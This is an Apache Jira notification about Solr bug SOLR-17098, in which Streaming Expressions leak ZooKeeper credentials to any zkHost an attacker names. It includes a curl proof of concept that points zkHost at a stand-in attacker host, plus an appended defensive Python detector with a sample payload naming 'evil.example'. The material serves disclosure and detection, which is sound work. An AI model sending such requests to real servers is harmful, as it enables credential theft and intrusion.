[ https://issues.apache.org/jira/browse/SOLR-17098?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18081007#comment-18081007 ]

Houston Putman commented on SOLR-17098:
---------------------------------------

Yeah I think that makes sense to me!

> Zookeeper Credential Information Disclosure bug via Streaming Expressions
> -------------------------------------------------------------------------
>
>                 Key: SOLR-17098
>                 URL: https://issues.apache.org/jira/browse/SOLR-17098
>             Project: Solr
>          Issue Type: Bug
>          Components: streaming expressions
>            Reporter: Houston Putman
>            Assignee: Houston Putman
>            Priority: Blocker
>             Fix For: 8.11.3, 9.4.1
>
>         Attachments: SOLR-17098-1.diff, SOLR-17098.diff
>
>
> Security list thread: 
> [https://lists.apache.org/thread/byrxkqk15mh6960wmx4r851srosgkvbh]
>  
> ZK Credentials and ACLs can be exposed to any endpoint when the Streaming 
> Handler is used:
>  
> curl --data-urlencode 'expr=search(collection1,
>        zkHost="target:2121",
>        qt="/export",
>        q="*:*",
>        fl="id,a_s,a_i,a_f",
>        sort="a_f asc, a_i asc")' http://localhost:8983/solr/demo/stream
>  
> In the command above, if the Solr instance has any Zookeeper Credentials or 
> ACLs provided, then that information will be sent to the "target:2121" 
> address. An attacker could set up a mock Zookeeper service to obtain the 
> credentials, and then gain access to Solr's Zookeeper Nodes.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
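
A defender-side check for the request pattern described in the issue, as an added example that is not part of the original message or of the Solr project's fix: it pulls every zkHost value out of a form-encoded /stream request body and reports hosts outside the cluster's own ZooKeeper ensemble. The ensemble in TRUSTED_ZK, the function names and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Assumption: the ZooKeeper ensemble this Solr cluster is really configured with.
TRUSTED_ZK = {"zk1.internal:2181", "zk2.internal:2181", "zk3.internal:2181"}

# zkHost="..." / zkHost='...' / zkHost=bare, at any nesting depth of the expression.
# Matched case-insensitively so the check errs on the side of flagging.
ZKHOST_RE = re.compile(
    r"""\bzkHost\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s,)]+))""", re.IGNORECASE)

def zk_hosts(expr):
    """Return every host:port named by a zkHost parameter in the expression."""
    hosts = []
    for m in ZKHOST_RE.finditer(expr):
        value = next(g for g in m.groups() if g is not None)
        ensemble = value.split("/", 1)[0]  # drop an optional chroot suffix
        hosts += [h.strip().lower() for h in ensemble.split(",") if h.strip()]
    return hosts

def untrusted_zk_hosts(body, trusted=TRUSTED_ZK):
    """body: form-encoded POST body, as produced by curl --data-urlencode."""
    found = []
    for expr in parse_qs(body).get("expr", []):
        found += [h for h in zk_hosts(expr) if h not in trusted]
    return found

# Constructed sample request bodies (not captured traffic).
SAMPLES = [
    urlencode({"expr": 'search(collection1, zkHost="target:2121", '
                       'qt="/export", q="*:*", fl="id", sort="id asc")'}),
    urlencode({"expr": 'search(collection1, '
                       'zkHost="zk1.internal:2181,zk2.internal:2181/solr", '
                       'q="*:*", fl="id", sort="id asc")'}),
    urlencode({"expr": 'search(collection1, q="*:*", fl="id", sort="id asc")'}),
    urlencode({"expr": "merge(search(a, zkHost='evil.example:2181', q='*:*'), "
                       "search(b, zkHost=\"zk3.internal:2181\", q='*:*'), "
                       "on='id asc')"}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(untrusted_zk_hosts(body) or "ok")
```
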
